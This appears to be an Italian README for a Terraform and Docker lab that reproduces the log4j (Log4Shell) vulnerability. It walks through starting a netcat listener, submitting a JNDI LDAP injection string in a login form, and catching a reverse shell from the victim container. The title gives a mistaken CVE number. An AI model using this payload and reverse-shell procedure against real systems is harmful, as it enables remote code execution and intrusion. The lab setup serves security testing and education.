
Terraform e risorse Docker per avviare rapidamente un test di CVE-2021-44428
Questo repository è configurato per testare rapidamente la vulnerabilità log4j utilizzando Docker e Hashicorp Terraform. Tutti i componenti di questo test verranno eseguiti in container Docker sulla rete Docker, accessibili tramite 'host.docker.internal'.
Questo ambiente di test deriva da un ottimo post sul blog di Raxis: (https://raxis.com/blog/log4j-exploit)
L'applicazione vulnerabile e il codice dell'exploit provengono da cyberxml (https://github.com/cyberxml/log4j-poc).
Tutto ciò che ho fatto è stato codificare l'ambiente per renderlo facile da avviare e testare questo delizioso exploit.
Non mi assumo alcuna responsabilità per effetti avversi o azioni dannose che potrebbero derivare dall'uso del materiale in questo repository. Punto e basta. Sta a te decidere se questi materiali sono affidabili ed è ugualmente tua responsabilità utilizzare queste informazioni in modo etico. Pubblico semplicemente queste chicche così che ricercatori, studenti e professionisti della sicurezza possano creare rapidamente un ambiente e testare l'exploit da soli. Seacrest out.
Accedi alla shell del container log4j_netcat usando 'docker exec -it netcat /bin/bash' o qualcosa di simile. È qui che riceverai la tua connessione shell al server vittima una volta stabilita.
Nella tua sessione all'interno del container log4j_netcat, inserisci il seguente comando per avviare il listener:
nc -lv -s 0.0.0.0 -p 9001
Nel tuo browser, vai su http://host.docker.internal:8080/log4shell/
Inserisci quanto segue nel campo 'Username' insieme a qualsiasi cosa tu voglia nel campo 'Password':
${jndi:ldap://host.docker.internal:1389/a}
Torna alla shell del container log4j_netcat e osserva che ti sei connesso al server vittima.
Vai e semina il caos!